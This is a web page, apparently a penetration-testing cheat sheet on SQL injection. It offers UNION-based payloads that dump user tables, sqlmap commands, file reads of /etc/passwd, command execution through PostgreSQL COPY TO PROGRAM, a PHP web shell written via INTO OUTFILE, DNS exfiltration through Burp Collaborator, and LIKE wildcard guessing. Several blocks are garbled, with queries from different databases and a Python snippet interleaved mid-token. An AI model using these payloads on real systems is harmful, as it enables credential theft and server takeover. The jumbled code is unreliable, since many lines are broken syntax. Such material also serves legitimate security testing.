Skip to main content

SQL Injection

MSQL

Database enumeration

TestMySQL

SELECT GROUP_CONCAT(schema_name,' or 1=1-- -

Identify number columns

Increase from 1 (column) ,' order by 1-- - Until error or different content ' order by 7-- -

Confirm number columns

' union select 1,2,@@VERSION,DB_NAME(),5,6-- -

Get tables

' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES--information_schema.schemata; -

SELECT

Get columns from table Users

GROUP_CONCAT(table_name,' union select 1,2,name,4,5,6,') FROM syscolumnsinformation_schema.tables; SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE id=(SELECT id FROM sysobjects WHERE nametable_name = 'Users')-- -

Dump data from table Users

' union select 1,2,username,password,4,5 FROM Users-- -

SQLMAP

Use file

sqlmap -r file.txt --batch --level 5 --risk 3users';

Post requestPostgreSQL

sqlmapSELECT -udatname FROM pg_database;
SELECT string_agg(table_name,',') FROM information_schema.tables;
SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name = 'https://website/page.php'users';
-X
POST

SQLite

--data
SELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'action=edit&id=3'sqlite_%';
--cookie="abcdefg12345"SELECT --batchsql --dumpFROM --levelsqlite_master 5WHERE --risktbl_name='users';
3SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users');

BypassError based

Encoding payload using utf-16

PostgreSQL

user_input' =AND input(1=CAST((SELECT username FROM users) AS int)--

File read/write & RCE

PostgreSQL

SELECT pg_ls_dir('>.');
SELECT pg_read_file('/etc/passwd');
COPY (SELECT ').strip(') utfTO =PROGRAM [f"\\u00{ord(i):02x}"'sleep for5';
i
in

MySQL

user_input]
SELECT print(LOAD_FILE('/etc/passwd');
SELECT '.join(utf)<?php system($_REQUEST[c]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Faster Exfiltration via DNS

  • https://github.com/PortSwigger/sqlmap-dns-collaborator
  • https://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf

SqlmapDnsCollaborator is a Burp Extension that lets you perform DNS exfiltration with Sqlmap with zero configuration needed. You won't need a domain name or a public IP, just a computer with Sqlmap and Burp.

How you would normally perform DNS exfiltration with Sqlmap:

  1. You buy a domain name, a public IP and then you set up a server
  2. You run Sqlmap on that server, which performs some SQL injection on the vulnerable target.
  3. Vulnerable target sends DNS requests to your DNS server containing interesting data.
  4. DNS requests are interpreted by Sqlmap.

How you are going to perform DNS exfiltration with Sqlmap and SqlmapDnsCollaborator:

  1. You open Burp on your computer and enable SqlmapDnsCollaborator.
  2. You run Sqlmap on your computer, which performs some SQL injection on the vulnerable target.
  3. Vulnerable target sends DNS requests to Burp Collaborator containing interesting data.
  4. SqlmapDnsCollaborator reads DNS requests from Burp Collaborator and sends them to Sqlmap.
  5. DNS requests are interpreted by Sqlmap.
sqlmap.py -r req.txt --dns-domain=yourcollab.burpcollaborator.net -v3 

SQL "LIKE" Wildcard Injection

This vulnerability, often overlooked and considered low risk, can have significant impacts in certain scenarios. It involves injecting a wildcard in the search field of a LIKE clause in a SQL statement.

Types of Wildcards

  • %: Equivalent to any string of zero or more characters.
  • _: Equivalent to any single character.

Vulnerability

An application becomes vulnerable when it uses the LIKE operator with a user-received parameter without filtering these wildcards. For example:

SELECT text FROM table WHERE secrets LIKE '$secret'

Even if the $secret parameter is sanitized to prevent SQL injection, wildcards can still be injected: http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________

"_" are the chars that match the wildcard

Sources